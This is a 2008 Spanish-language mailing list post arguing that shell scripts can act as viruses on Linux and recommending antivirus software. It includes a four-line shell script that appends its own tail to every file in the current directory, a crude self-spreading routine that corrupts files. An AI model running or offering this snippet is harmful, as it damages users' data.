[U-co] sobre virus

Lucio H. Mora Horta lucio.mora en keyword.net.co
Vie Jul 18 15:18:32 UTC 2008

Efectivamente los virus no necesariamente archivos ejecutables. Basta
simplemente
con que sea un binario capaz de ejecutar direcciones de memoria de forma
dinámica.
De manera que utilizades como los Shell permiten hacer "virus" para Linux

Por ejemplo:

#!/bin/sh
for FICHERO in *
do
  tail -4 $0 >> $FICHERO
done

Por lo que en mi concepto muy personal siempre se debe tener instalado
un Antivirus
de manera que se prevengan problemas. Esto hace que sea indispensable
dentro de la
comunidad, crear un pequeño foro para debatir más sobre el tema y
aclarar mitos
y cosas por el estilo.

Atentamente,

*LUCIO H. MORA*
Director de Tecnología

*KeyWord e-Factory Ltda. Calle 79 No. 18-34 Of. 306  Lago Norte*
Bogota D.C. Colombia (Suramérica)
Tel: (571) 6103189 - 6103206
Fax: (571) 6103189
Cel: 300 8326579
e-Mail: lucio.mora en keyword.net.co

De conformidad con la Ley 527 de 1999 de Comercio Electrónico en Colombia, el presente mensaje,
asi como sus anexos, son de propiedad de KeyWord e-Factory Ltda, de modo que puede
contener información privilegiada o confidencial. Si Usted ha recibido un mensaje por error
y no es el destinatario voluntario del mismo o de la información contenida en él, por favor
haga caso omiso al mensaje y reenvielo al remitente original o en su defecto a info en keyword.net.co <mailto:info en keyword.net.co>.
KeyWord e-Factory Ltda., no se responsabiliza por el uso inadecuado o diferente que se den
a sus comunicaciones, respecto a los fines para los cuales fueron creadas.

"Honeste viviere, alterum non laedere et ius suum quique tribuere"